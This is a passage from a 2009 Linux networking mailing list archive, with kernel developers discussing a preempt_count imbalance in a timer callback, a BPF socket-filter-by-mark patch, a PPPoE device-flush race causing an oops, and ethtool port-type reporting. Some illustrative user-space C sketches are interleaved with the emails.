To: Anirban Sinha; +Cc: linux-kernel, David Miller, netdev, Anirban Sinha
In-Reply-To: <4ADB7856.7000803@anirban.org>
Hi Anirban,
On 10/18, Anirban Sinha wrote:
>
> I have a question for you. The queue_work() routine which is called from
> schedule_work() does a put_cpu() which in turn does an enable_preempt(). Is
> this an attempt to trigger the scheduler?
No. Please note that queue_work() does get_cpu() + put_cpu() to protect
against cpu_down() in between.
This can trigger the scheduler of course, but everything should be OK.
> One of the side effects of
> this enable_preempt() is the crash that we see below. What is happening
> is that a timer callback routine, in this case inet_twdr_hangman(),
> tries a bunch of cleanup until a threshold is reached. If further cleanups
> need to be done beyond the threshold, it queues a work function. Now when
> the timer callback is run in __run_timers(), the routine grabs the value
> of preempt_count before and after the callback function call. If the two
> counts do not match, it calls BUG() (line 1037 in kernel/timer.c).
Yes, but I can't see how queue_work() can be involved, it doesn't change
->preempt_count. Note again it does put after get.
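To make the argument above concrete, here is a small user-space model of the check. It is only a sketch: preempt_count is a plain int here, and every model_* name, balanced_callback() and leaky_callback() are made up for illustration and are not kernel functions. It shows that a get + put pair leaves the counter unchanged, so only a callback that returns with an unmatched increment trips the before/after comparison.

```c
#include <stdbool.h>

/* Stand-in for the per-task preempt counter (assumption: plain int). */
int preempt_count;

void model_get_cpu(void) { preempt_count++; }   /* disables preemption */
void model_put_cpu(void) { preempt_count--; }   /* re-enables preemption */

/* Models queue_work(): get followed by put, net change is zero. */
void model_queue_work(void)
{
    model_get_cpu();
    /* ... the work would be queued on the current CPU here ... */
    model_put_cpu();
}

/* A timer callback that only queues work: balanced. */
void balanced_callback(void) { model_queue_work(); }

/* A callback that returns with one unmatched increment, for example
 * a lock taken on some path and never released (hypothetical). */
void leaky_callback(void) { preempt_count++; }

/* Models the check described for __run_timers(): compare the counter
 * before and after the callback. Returns false where the kernel would
 * call BUG(); the model restores the counter so it can keep running. */
bool model_run_timer(void (*fn)(void))
{
    int before = preempt_count;

    fn();
    if (preempt_count != before) {
        preempt_count = before;
        return false;
    }
    return true;
}
```

In this model, model_run_timer(balanced_callback) passes while model_run_timer(leaky_callback) fails, which is why the imbalance has to be looked for elsewhere than in queue_work().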
> Is it illegal to schedule a work function from within a timer callback?
No, it is legal, sure.
I'd suppose that this imbalance comes from the inet_twdr_hangman() paths.
Could you verify this?
Oleg.
^ permalink raw reply
* [PATCH]: ingress socket filter by mark
From: jamal @ 2009-10-19 12:17 UTC (permalink / raw)
To: David Miller, netdev; +Cc: Eric Dumazet, Maciej Żenczykowski
[-- Attachment #1: Type: text/plain, Size: 70 bytes --]
apps can specify mark that they want to accept/reject.
cheers,
jamal
[-- Attachment #2: filt-sock-m-3 --]
[-- Type: text/plain, Size: 1099 bytes --]
commit ec187e3028db866161b881c5ac9eeea4e9bb0f1f
Author: Jamal Hadi Salim <hadi@cyberus.ca>
Date: Mon Oct 19 08:12:46 2009 -0400
[PATCH]: ingress socket filter by mark
Allow bpf to set a filter to drop packets that dont
match a specific mark
Signed-off-by: Jamal Hadi Salim <hadi@cyberus.ca>
diff --git a/include/linux/filter.h b/include/linux/filter.h
index 1354aaf..909193e 100644
--- a/include/linux/filter.h
+++ b/include/linux/filter.h
@@ -123,7 +123,8 @@ struct sock_fprog /* Required for SO_ATTACH_FILTER. */
#define SKF_AD_IFINDEX 8
#define SKF_AD_NLATTR 12
#define SKF_AD_NLATTR_NEST 16
-#define SKF_AD_MAX 20
+#define SKF_AD_MARK 20
+#define SKF_AD_MAX 24
#define SKF_NET_OFF (-0x100000)
#define SKF_LL_OFF (-0x200000)
diff --git a/net/core/filter.c b/net/core/filter.c
index d1d779c..e3987e1 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -303,6 +303,9 @@ load_b:
case SKF_AD_IFINDEX:
A = skb->dev->ifindex;
continue;
+ case SKF_AD_MARK:
+ A = skb->mark;
+ continue;
case SKF_AD_NLATTR: {
struct nlattr *nla;
^ permalink raw reply related
* Re: kernel panic in latest vanilla stable, while using nameif with "alive" pppoe interfaces
From: Eric Dumazet @ 2009-10-19 12:36 UTC (permalink / raw)
To: Michal Ostrowski; +Cc: Denys Fedoryschenko, netdev, linux-ppp, paulus, mostrows
In-Reply-To: <e6d1cecd0910182034t9d24859mc6f392875b36ad17@mail.gmail.com>
Michal Ostrowski a écrit :
> Here's my theory on this after an initial look...
>
> Looking at the oops report and disassembly of the actual module binary
> that caused the oops, one can deduce that:
>
> Execution was in pppoe_flush_dev(). %ebx contained the pointer "struct
> pppox_sock *po", which is what we faulted on, executing "cmp %eax, 0x190(%ebx)".
> %ebx value was 0xffffffff (hence we got "NULL pointer dereference at 0x18f").
>
> At this point "i" (stored in %esi) is 15 (valid), meaning that we got a value
> of 0xffffffff in pn->hash_table[i].
>
> From this I'd hypothesize that the combination of dev_put() and release_sock()
> may have allowed us to free "pn". At the bottom of the loop we already
> recognize that since locks are dropped we're responsible for handling
> invalidation of objects, and perhaps that should be extended to "pn" as well.
> --
> Michal Ostrowski
> mostrows@gmail.com
>
>
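The step from %ebx == 0xffffffff to a fault at 0x18f is plain 32-bit wraparound. A tiny sketch of the arithmetic follows (fault_address() is a made-up helper, and it assumes the 32-bit address space of the i386 oops above):

```c
#include <stdint.h>

/* Effective address of "0x190(%ebx)" on a 32-bit machine:
 * base + displacement, wrapping modulo 2^32. */
uint32_t fault_address(uint32_t base, uint32_t displacement)
{
    return base + displacement;
}
```

With base 0xffffffff and displacement 0x190 this gives 0x18f, which lands in the first page and is therefore reported as a NULL pointer dereference.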
Looking at this stuff, I do believe flush_lock protection is not
properly done.
At the end of pppoe_connect() for example we can find :
err_put:
if (po->pppoe_dev) {
dev_put(po->pppoe_dev);
po->pppoe_dev = NULL;
}
This is done without any protection, and can therefore clash with
pppoe_flush_dev() :
spin_lock(&flush_lock);
po->pppoe_dev = NULL; /* pppoe_dev can already be NULL before this point */
spin_unlock(&flush_lock);
dev_put(dev); /* oops */
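One way to avoid this kind of clash is for every path to claim the pointer under the lock and to drop the reference only if it actually got a non-NULL pointer. Below is a user-space model of that idea, not a proposed kernel patch: struct model_dev, struct model_sock, model_dev_put() and model_detach_dev() are invented for the sketch, a pthread mutex stands in for the flush_lock spinlock, and a C11 atomic stands in for the device refcount.

```c
#include <pthread.h>
#include <stdatomic.h>
#include <stddef.h>

struct model_dev  { atomic_int refcnt; };       /* stand-in for net_device */
struct model_sock { struct model_dev *dev; };   /* stand-in for po->pppoe_dev */

pthread_mutex_t flush_lock = PTHREAD_MUTEX_INITIALIZER;

void model_dev_put(struct model_dev *dev)
{
    atomic_fetch_sub(&dev->refcnt, 1);
}

/* Detach the device from the socket. Whoever swaps the pointer to NULL
 * under the lock owns the reference and is the only one to put it.
 * Returns 1 if this caller dropped the reference, 0 otherwise. */
int model_detach_dev(struct model_sock *po)
{
    struct model_dev *dev;

    pthread_mutex_lock(&flush_lock);
    dev = po->dev;
    po->dev = NULL;
    pthread_mutex_unlock(&flush_lock);

    if (dev == NULL)
        return 0;       /* another path already detached it */

    model_dev_put(dev);
    return 1;
}
```

If both the error path and the flush path go through a helper like this, the second caller sees NULL and does nothing, so the reference is dropped exactly once.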
^ permalink raw reply
* Re: [PATCH] myri10ge: improve port type reporting in ethtool output
From: Ben Hutchings @ 2009-10-19 13:03 UTC (permalink / raw)
To: Andrew Gallatin
Cc: Brice Goglin, David S. Miller, Linux Network Development list
In-Reply-To: <4ADC5CB8.4010801@myri.com>
On Mon, 2009-10-19 at 08:34 -0400, Andrew Gallatin wrote:
> Ben Hutchings wrote:
>
> > Lying about link modes is not an improvement.
>
> OK, so we're probably doing something wrong. I suspect we're not
> alone. At least we don't set SUPPORTED_TP for CX4, like I've
> seen some NICs do.
>
> Can somebody suggest how we can tell ethtool that
> the NIC supports 10Gb only (no autoneg down to 1Gb or lower)
> for copper (10Gbase-CX4)? How about for fiber (10Gbase-{S,L}R)?
What's wrong with what you already do? Customers expect to see
something on the supported line?
Ben.
--
Ben Hutchings, Senior Software Engineer, Solarflare Communications
Not speaking for my employer; that's the marketing department's job.
They asked us to note that Solarflare product names are trademarked.
^ permalink raw reply
* Re: [PATCH] myri10ge: improve port type reporting in ethtool output
From: Andrew Gallatin @ 2009-10-19 12:34 UTC (permalink / raw)
To: Ben Hutchings
Cc: Brice Goglin, David S. Miller, Linux Network Development list
In-Reply-To: <1255939929.3916.13.camel@localhost>
Ben Hutchings wrote:
> Lying about link modes is not an improvement.
OK, so we're probably doing something wrong. I suspect we're not
alone. At least we don't set SUPPORTED_TP for CX4, like I've
seen some NICs do.
Can somebody suggest how we can tell ethtool that
the NIC supports 10Gb only (no autoneg down to 1Gb or lower)
for copper (10Gbase-CX4)? How about for fiber (10Gbase-{S,L}R)?
Thanks,
Drew
^ permalink raw reply